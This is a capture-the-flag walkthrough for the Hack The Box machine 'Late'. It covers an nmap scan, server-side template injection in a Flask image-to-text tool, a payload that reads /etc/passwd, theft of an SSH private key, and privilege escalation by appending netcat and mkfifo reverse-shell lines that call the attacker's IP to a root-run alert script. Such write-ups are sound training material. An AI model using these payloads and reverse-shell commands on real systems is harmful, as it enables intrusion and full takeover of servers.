Hack The Box Late Walkthrough
Late
Initial recon
Machine IP : 10.10.11.156
NMAP Scan
List of open ports :
$ sudo nmap 10.10.11.156 -p- -T5 -sSVC -oA Late/late_full_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 10:43 UTC
Warning: 10.10.11.156 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.156
Host is up (0.098s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
51656/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.39 seconds
There’s only 2 open ports, 22 and 80, ssh and http.
On ssh port, we will surely find nothing, so let’s start by the http port.
Website
Navigation
By scrolling the website, and putting our mouse on a hyperlink “late free online photo editor” we can see a subdomain in images.late.htb. Let’s add it to the hosts file.
When we are going on http://images.late.htb, we land on a “Convert image to text with Flask”.
The functionnality asks a photo in input. The output is stored in a file called “result.txt” which contain some html code corresponding to the text present on the picture.
Flask
Flask is known for SSTI (Server Side Template Injection). A Server-Side Template Injection is possible when an attacker injects template directive as user input that can execute arbitrary code on the server. When can test it using a simple payload :
- {{7*7}}
If the server is vulnerable to SSTI, then the output should be <p>49</p>
. We then write our payload in a file, take a picture of it, and input it in the Image Reader functionnality. We then grab the result.txt file containing our output :
First access to the server
The server is vulnerable to SSTI. We have to create a payload for exploiting the SSTI vulnerability. The first payload we’re going to use is for grabbing the “/etc/passwd” file :
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
And, it’s working !
We can see a user here : svc_acc. We can grab the “user.txt” file in “/home/svc_acc/user.txt” :
By parsing it’s home directory, a “.ssh” folder is present, containing a “id_rsa” file refering to private ssh key.
We chmod the id_rsa key to 600, and with ssh -i id_rsa svc_acc@10.10.11.156
and we can connect to the server in ssh.
Escalation to root
Enumeration
Now that we are connected as user (svc_acc), we need to find our way to root. We will let “linpeas.sh” enumerate the machine for us, let’s run it, and grab a cup of coffee.
After few minutes of execution and parsing the output, a file might be interesting :
This file contain a script emailing the root user about weird connection on the ssh server :
#!/bin/bash
RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"
BODY="
A SSH login was detected.
User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
We have for the moment no idea if this script is run on the server, or not. We run pspy to confirm the use of the script. At first we thought the script wasn’t run at all. Then we remembered it watch on ssh server and email root to log every connections. We logged in and saw :
Exploitation
The idea is then to add code in the script, and to trigger a reverse shell, as root this time. But we can’t edit the file to add our payload. I tried many things, but the manipulation that worked was to echo my payload and redirect the output into the file :
echo "nc 10.10.14.4 1337 -e /bin/bash" >> /usr/local/sbin/ssh-alert.sh
This doesn’t work. The creator of this machine installed a version of netcat which doesn’t allow “-e” parameter. We then use the fifo technique from this cheat sheet :
Our final payload is then :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1337 > /tmp/f
We fire up pwncat-cs and listen on port 1337, and connect to ssh as svc_acc. This trigger the bash script and execute our payload.
Bim Bam Boom, rooted !
Thank you for reading.
Libereau